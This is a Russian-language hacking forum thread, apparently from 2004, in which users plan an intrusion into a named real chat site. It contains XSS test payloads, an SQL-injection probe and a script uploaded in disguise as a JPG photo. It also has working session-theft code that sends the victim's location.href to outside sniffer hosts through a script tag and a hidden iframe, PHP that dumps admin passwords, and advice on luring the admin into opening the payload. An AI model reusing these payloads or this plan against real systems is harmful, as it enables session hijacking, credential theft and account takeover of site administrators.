http://vochat.com/ сырцы вроде как
http://chat.hitv.ru сам чат
интересно просто есть ли там баги и возможно ли получение админки
как я там понял все делается с помощью сессии ...
xss в инфо не канает там все теги фильтруются как я просмотрел тут Zfailure сток видюшек насоздавал
в общем будет время посмотрите я буду заходить сюда иногда http://forum.antichat.ru/iB_html/non...icons/turn.gif удачи

ок! посмотрим

в самом чате там вроде все проверяется
но там вроде есть дополнительный скрипт для поиска юзера, в нем вроде xss есть

да такой скрипт и правда есть пример на чате
http://chat.hitv.ru/users.php
так же там есть xss
<script&gt;alert();&lt;/script&gt; -ок
<script&gt;alert(123);&lt;/script&gt; - ок
<script&gt;alert(as);&lt;/script&gt; - уже не ок
<script&gt;alert('as&#39http://forum.antichat.ru/iB_html/non...icons/wink.gif;&lt;/script&gt;- тут интереснее
database error: cannot search user
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'as&#39http://forum.antichat.ru/iB_html/non...icons/wink.gif;%'' at line 1
кажется возможен sql-injection хотя не буду утверждать
+ это же скрипт поиска а не инфы ,ты несможешь сохранить свой ява скрипт &nbsp;и показать его ламеру чтобы перехватить его сессию
в общем смотрите ; ) я зайду еще
удачи

ps: http://chat.hitv.ru/ разрешено входить только 1 человеку ( не используя прокси есесно : ) )
и http://chat.hitv.ru/board_send.php?session=blablabla
в поле тема и сообщение теги фильтруются, неработает
=(
http://tehline.ru/test.jpg
интересно однако можно на сайте вставить картинку
разрешено выполнение этого веб индикатора
но поменять код на свой ява скрипт вроде нельзя
удач

В директорию /chat/photos/0/ можно загружать любые файлы (хранятся фото участников чата), но только с расширением gif или jpg, вот как бы можно было, например, исполнить РНР-скрипт, загруженный туда?

Загрузить - загрузил, на месте картинки имеется пустой квадратик, когда же напрямую обращаюсь к этому файлу, например http://chat/photos/0/1234.big.jpg, то показывается исходный код скрипта...

Есть вот еще какая вещь...
http://chat/admin/index.php

В принципе, возможно использование WWWhack....

Эта Админка только для верховного админа или для всех админов?

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (NoOne @ октября 30 2004,16:49)</td></tr><tr><td id="QUOTE">то показывается исходный код скрипта...[/QUOTE]<span id='postcolor'>
А если загрузить javascript, он срабатывает ?
типа
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<script>alert()</script>
[/QUOTE]<span id='postcolor'>

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ октября 30 2004,17:00)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (NoOne @ октября 30 2004,16:49)</td></tr><tr><td id="QUOTE">то показывается исходный код скрипта...[/QUOTE]<span id='postcolor'>
А если загрузить javascript, он срабатывает ?
типа
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<script>alert()</script>
[/QUOTE]<span id='postcolor'>[/QUOTE]<span id='postcolor'>
))))))))))))))))))))))))))))
Срабатывает
))))))))))))))))))))))))))))

Вот только что дальше делать?
Извиняюсь, может быть, за столь глупый вопрос, но хотя бы общие черты дальнейших действий...

Раз срабатывает, значит возможен пассивный XSS, и угон куков.
Суть уязвимости такова - поскольку скрипт срабатывает в домене самого чата, то этому скрипту будут доступны куки того, у кого этот скрипт срабатывает (например админа).
Использовать так:
под видом картинки заливается скрипт, отсылающий куки на сниффер(пример приведен в описании cgi-сниффера), плюс к этому - скрипт также должен отобразить рисунок (что бы админ ничего не заподозрил). А далее нужно каким-то образом заставить админа взглянуть на твою фотку. Это можно сделать кучей способов. Начиная от тупого кидания линка в приват, и заканчивая заманиванием админа на свой сайт, где этот линк откроется в скрытом фрейме.

(только предварительно выясни есть ли что то полезное в куках вообще)))

Algol, спасибо большое за столь подробное объяснение, мало кто так толково объяснит и таким нормальным человеческим языком :)

От куков никакой пользы вообще нет, в них передается номер комнаты, цвет и сам ник, а вот самое главное - это сессия, которая передается только в строке адреса....

А можно каким-либо образом перехватить значение сессии не через куки?

А зачем париться с куками, раз можно перехватить реферер ?

НДА!!!
1. Захват куков в том чате ничего не даст!!! там идёр работа с сэссиями тоесть с локатион если захватить куки, то захватиь только имя и цвет вводимых сообщени!!! Да чат очень хороь в предыдущей версии была дыра получения приватов через ХЕЛП... но в новой версии её заделали!!!
1. Для начала конечно хотя бы попробовать красть куки... но снифер там ни через ник, ни через цвет, вообщем никак не пролазит... нужно юзать.
2. Конечно хочетса получить доступ к админке к файлу admin_users.php в котором &nbsp;хранитса имя и пароль... ну получить его как такого можно только имея свой скрипт на нтом сервере... но как такого его туда закачать нужно, через фото скрипт НЕЗАКАЧАТЬ НИКАК... потому что там идт проверка на гиф и ГПГ картинки...

тоесь особо нужно работать с рефером и с админкойй

http://forum.antichat.ru/iB_html/non...icons/cool.gif Вот сижу и думаю : интересно кто нибудь проверял на баги чаты www.interchat.ru
тэги вводятся без проблем........

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (пр0х0жий @ октября 20 2004,08:30)</td></tr><tr><td id="QUOTE">да такой скрипт и правда есть пример на чате
http://chat.hitv.ru/users.php
так же там есть xss
<script&gt;alert();&lt;/script&gt; -ок
<script&gt;alert(123);&lt;/script&gt; - ок
<script&gt;alert(as);&lt;/script&gt; - уже не ок
<script&gt;alert('as');&lt;/script&gt;- тут интереснее
database error: cannot search user
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'as');%'' at line 1
кажется возможен sql-injection хотя не буду утверждать
+ это же скрипт поиска а не инфы ,ты несможешь сохранить свой ява скрипт и показать его ламеру чтобы перехватить его сессию
в общем смотрите ; ) я зайду еще
удачи[/QUOTE]<span id='postcolor'>
Что-то я не пойму, а как было реализовано

<script&gt;alert('as');&lt;/script&gt;- тут интереснее

чтобы Сервер сказал о синтаксической ошибке?

Игорёк... не надо перхватывать сээсиию как ты СКАЗАЛ через КУКИ... просто напросто вмечто document.cookie нужно location.href в моём снифере там всё есть... помоему он даже удобней чем античатовский!!!

XSS там не пашет это БРЕД!!! <script&gt;alert('as&#39http://forum.antichat.ru/iB_html/non...icons/wink.gif;&lt;/script&gt;- - это ваще полный бред какойто впариваете... интересно ж что от не го можно получить интересно полезного!!! ДА вообщем что нужно юзать я описал в предыдущей статье... пробовал я получить через iframe но аналогичный результат он выполняетса скрипт естественно... а нужно его исход... и просто получить переменые файла админки

не пашет вроде если в alert вставить символы как мне показалось ....кстати где твоя статья то по данной теме ? посмотрю.....и ссылочку на свой сниффер желательно http://forum.antichat.ru/iB_html/non...icons/turn.gif посмотреть интересно ....
удачи

кстати переменные файла админки наверно можно найти в сырцах самого чата http://forum.antichat.ru/iB_html/non...icons/turn.gif

Конечно можно я ж показал уже
&lt;?
require &quot;/полный путь/admin/admin_users.php&quot;;
print $admin_users[0][&quot;nickname&quot;];
print &quot;&lt;br&gt;&quot;;
print $admin_users[0][&quot;password&quot;];

?&gt;

Андрюш, я вообще-то от идеи использовать куки сразу отказалс, т.к. в куки передается только номер комнаты, номер цвета и название ника, вот потому я использовал следующий код
&lt;html&gt;
&lt;head&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;tr&gt;&lt;td&gt;
&lt;img src=&quot;http://chat/photos/26.big.jpg&quot;&gt;
<script src=&quot;http://antichat.ru/cgi-bin/s.jpg?zz_...ation.href&gt;
&lt;/script&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/body&gt;
&lt;/html&gt;
НО... как я говорил, в Реферере передается ссылка на картинку, а не адресная строка того, кто кликнул по этой ссылке, вот в чем загвоздка...
А получив сессию Верховного Админа чата можно и в Админку залезть и посмотреть Логины и Пароли всех остальных админов, а также получить доступ к Форуму и ФТП (это особо интересно), т.к. я не думаю, что у &quot;этого&quot; админа разные пароли на Чат, Форум и ФТП )))))

Насколько я вычитал в доках по ЯваСкриптам и ВБСкриптам, то различают Серверные скрипты и клиентские, т.е. все же с помощью ЯваСкрипта можно получить доступ к файлам на серевере, только вот что это за Серверные скрипты и какое условие должно выполняться, чтобы сервер воспринял скрипт как серверный....?

И вот еще что... почему я спрашивал по поводу
<script&gt;alert('as');&lt;/script&gt;- тут интереснее
database error: cannot search user
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'as');%'' at line 1

Чтобы была возможность узнать полный путь на сервере к чату....

Вопрос собствено к пр0х0жему - каким образом и каким кодом ему удалось вызвать синтаксическую ошибку?

Игорёк объясняю тебе!!! вообщем забей на это снифер!!! пользуйся моим изобретением... вообщем такого я понял что ты имеешь ввиду ... вот исход файла
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<script>

var smr = "http://seechat.fatal.ru/friker/frika.php?" + location.href;
document.write("<iframe src="+smr+" width=0 heigth=0></iframe>")
</script>
[/QUOTE]<span id='postcolor'>
Как видишь мы получаем локатион окна к которому обратился юзер... вот почему у тебя в рефере и пишет путь к картинке ... Понял ? нет?
вот! вспомни как нащёт старого чата я делал... я посылал ник со скриптом в сам чат... но там ишла ещё + картинка которая не показывалась и при входе в чат админ видел наш ник и отсылались к нам окно администтратора там ГДЕ скрипт наш.. тоесть окно фрэйма look понял??? значит это нам ничего не даст, нащёт этого даже можешь не пробовать... потому что при откытии это окна к нам отошлётса его рефер с нащей же картинко... нужно скрипт это заливать в чат сам... вот! но идея совсем другая... нужно вообщем через этот скрипт обратитса к окну его, но трабла в чём, в том что может у него быть 5 а может и 10 окон открыто... тоеть нужно юзать через TITLE чтоб TITLE ID окна был = &quot;Нашему чату&quot;

а путь тебе узнавать не надо! я путь уже знаю!